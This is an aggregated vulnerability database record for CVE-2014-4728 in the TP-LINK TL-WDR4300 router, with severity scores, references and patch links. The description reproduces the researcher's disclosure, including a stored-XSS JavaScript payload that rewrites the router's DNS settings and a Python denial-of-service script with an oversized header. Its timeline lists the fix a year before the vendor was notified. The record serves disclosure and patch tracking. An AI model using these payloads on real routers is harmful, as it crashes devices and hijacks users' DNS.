Details of VAR-201409-0078

ID

VAR-201409-0078

CVE

CVE-2014-4728

TITLE

TP-LINK N750 Wireless Dual Band Gigabit Router firmware Web Service disruption at the server (DoS) Vulnerabilities

Trust: 0.8

sources: JVNDB: JVNDB-2014-004486

DESCRIPTION

The web server in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to cause a denial of service (crash) via a long header in a GET request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has a denial of service vulnerability that allows an attacker to exploit a vulnerability to initiate a denial of service attack. TP-LINK WDR4300 is prone to an HTML-injection vulnerability and a denial-of-service vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage these issues to cause denial-of-service conditions or execute attacker-supplied HTML or script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. TP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company. Versions Affected: 130617 , possibly earlier CVE Numbers Assigned: CVE-2014-4727, CVE-2014-4728 Vulnerabilities Description =================== # Stored XSS - It is possible inject javascript code via DHCP hostname field, If the administrator will visit the dhcp clients page (web panel) the script will execute. Proof of Concept: ============ http://elisyan.com/tplink/wdr4300.html ---- start wdr4300.html ---- /* Author: Oz Elisyan Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check) */ var xmlhttp; if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else {// code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 && xmlhttp.status==200) { document.getElementById("myDiv").innerHTML=xmlhttp.responseText; } } xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true); xmlhttp.send(); ---- end wdr4300.html ---- http://elisyan.com/tplink/wdr4300.py ---- start wdr4300.py ---- #Author: Oz Elisyan #TP-Link WDR4300 DoS PoC import httplib conn = httplib.HTTPConnection("192.168.0.1") headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "DoS": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} conn.request("GET","/", "Let me tell you something", headers) print "Done" ---- end wdr4300.py ---- Report Timeline: =========== 2014-07-04: Vendor notified about the vulnerabilities with all the relevant technical information. 2013-09-16: Vendor released a fix. Credits: ====== The Vulnerabilities was discovered by Oz Elisyan. References: ======== http://www.tp-link.com/lk/products/details/?model=TL-WDR4300

Trust: 2.61

sources: NVD: CVE-2014-4728 // JVNDB: JVNDB-2014-004486 // CNVD: CNVD-2014-06260 // BID: 70037 // VULHUB: VHN-72669 // PACKETSTORM: 128343

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2014-06260

AFFECTED PRODUCTS

vendor:	tp link	model:	tl-wdr4300	scope:	lte	version:	130617	Trust: 1.0
vendor:	tp link	model:	tl-wdr4300	scope:	eq	version:	-	Trust: 1.0
vendor:	tp link	model:	tl-wdr4300	scope:	-	version:	-	Trust: 0.8
vendor:	tp link	model:	tl-wdr4300	scope:	lt	version:	140916	Trust: 0.8
vendor:	tp link	model:	wdr4300 running	scope:	eq	version:	130617	Trust: 0.6
vendor:	tp link	model:	tl-wdr4300	scope:	eq	version:	130617	Trust: 0.6

sources: CNVD: CNVD-2014-06260 // JVNDB: JVNDB-2014-004486 // CNNVD: CNNVD-201409-1170 // NVD: CVE-2014-4728

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2014-4728
value:	MEDIUM
Trust: 1.0
NVD:	CVE-2014-4728
value:	MEDIUM
Trust: 0.8
CNVD:	CNVD-2014-06260
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-201409-1170
value:	MEDIUM
Trust: 0.6
VULHUB:	VHN-72669
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2014-4728
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:N/I:N/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	NONE
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
CNVD:	CNVD-2014-06260
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:N/I:N/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	NONE
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-72669
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:N/I:N/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	NONE
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

sources: CNVD: CNVD-2014-06260 // VULHUB: VHN-72669 // JVNDB: JVNDB-2014-004486 // CNNVD: CNNVD-201409-1170 // NVD: CVE-2014-4728

PROBLEMTYPE DATA

problemtype:

CWE-399

Trust: 1.9

sources: VULHUB: VHN-72669 // JVNDB: JVNDB-2014-004486 // NVD: CVE-2014-4728

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201409-1170

TYPE

resource management error

Trust: 0.6

sources: CNNVD: CNNVD-201409-1170

CONFIGURATIONS

sources: JVNDB: JVNDB-2014-004486

PATCH

title:	TL-WDR4300	url:	http://www.tp-link.com/lk/products/details/?model=TL-WDR4300	Trust: 0.8
title:	Patch for TP-LINK WDR4300 Denial of Service Vulnerability	url:	https://www.cnvd.org.cn/patchInfo/show/50287	Trust: 0.6
title:	TL-WDR4300_v1_140916	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=56684	Trust: 0.6

sources: CNVD: CNVD-2014-06260 // JVNDB: JVNDB-2014-004486 // CNNVD: CNNVD-201409-1170

EXTERNAL IDS

db:	NVD	id:	CVE-2014-4728	Trust: 3.5
db:	BID	id:	70037	Trust: 2.6
db:	PACKETSTORM	id:	128343	Trust: 1.8
db:	JVNDB	id:	JVNDB-2014-004486	Trust: 0.8
db:	CNVD	id:	CNVD-2014-06260	Trust: 0.6
db:	XF	id:	96140	Trust: 0.6
db:	CNNVD	id:	CNNVD-201409-1170	Trust: 0.6
db:	VULHUB	id:	VHN-72669	Trust: 0.1

sources: CNVD: CNVD-2014-06260 // VULHUB: VHN-72669 // BID: 70037 // JVNDB: JVNDB-2014-004486 // PACKETSTORM: 128343 // CNNVD: CNNVD-201409-1170 // NVD: CVE-2014-4728

REFERENCES

url:	http://seclists.org/fulldisclosure/2014/sep/80	Trust: 2.5
url:	http://www.securityfocus.com/bid/70037	Trust: 2.3
url:	http://packetstormsecurity.com/files/128343/tp-link-wdr4300-xss-denial-of-service.html	Trust: 1.7
url:	http://www.securityfocus.com/archive/1/533499/100/0/threaded	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/533501/100/0/threaded	Trust: 1.1
url:	https://exchange.xforce.ibmcloud.com/vulnerabilities/96140	Trust: 1.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4728	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4728	Trust: 0.8
url:	http://www.securityfocus.com/archive/1/archive/1/533501/100/0/threaded	Trust: 0.6
url:	http://xforce.iss.net/xforce/xfdb/96140	Trust: 0.6
url:	http://www.securityfocus.com/archive/1/archive/1/533499/100/0/threaded	Trust: 0.6
url:	http://elisyan.com/tplink/wdr4300.py	Trust: 0.1
url:	http://elisyan.com/tplink/wdr4300.html	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2014-4728	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2014-4727	Trust: 0.1
url:	http://www.tp-link.com/lk/products/details/?model=tl-wdr4300	Trust: 0.1

sources: CNVD: CNVD-2014-06260 // VULHUB: VHN-72669 // JVNDB: JVNDB-2014-004486 // PACKETSTORM: 128343 // CNNVD: CNNVD-201409-1170 // NVD: CVE-2014-4728

CREDITS

Oz Elisyan

Trust: 0.4

sources: BID: 70037 // PACKETSTORM: 128343

SOURCES

db:	CNVD	id:	CNVD-2014-06260
db:	VULHUB	id:	VHN-72669
db:	BID	id:	70037
db:	JVNDB	id:	JVNDB-2014-004486
db:	PACKETSTORM	id:	128343
db:	CNNVD	id:	CNNVD-201409-1170
db:	NVD	id:	CVE-2014-4728

LAST UPDATE DATE

2025-04-13T23:31:37.606000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2014-06260	date:	2014-09-24T00:00:00
db:	VULHUB	id:	VHN-72669	date:	2018-10-09T00:00:00
db:	BID	id:	70037	date:	2014-09-25T00:02:00
db:	JVNDB	id:	JVNDB-2014-004486	date:	2014-10-02T00:00:00
db:	CNNVD	id:	CNNVD-201409-1170	date:	2014-10-08T00:00:00
db:	NVD	id:	CVE-2014-4728	date:	2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2014-06260	date:	2014-09-24T00:00:00
db:	VULHUB	id:	VHN-72669	date:	2014-09-30T00:00:00
db:	BID	id:	70037	date:	2014-09-21T00:00:00
db:	JVNDB	id:	JVNDB-2014-004486	date:	2014-10-02T00:00:00
db:	PACKETSTORM	id:	128343	date:	2014-09-22T18:32:22
db:	CNNVD	id:	CNNVD-201409-1170	date:	2014-09-30T00:00:00
db:	NVD	id:	CVE-2014-4728	date:	2014-09-30T16:55:06.653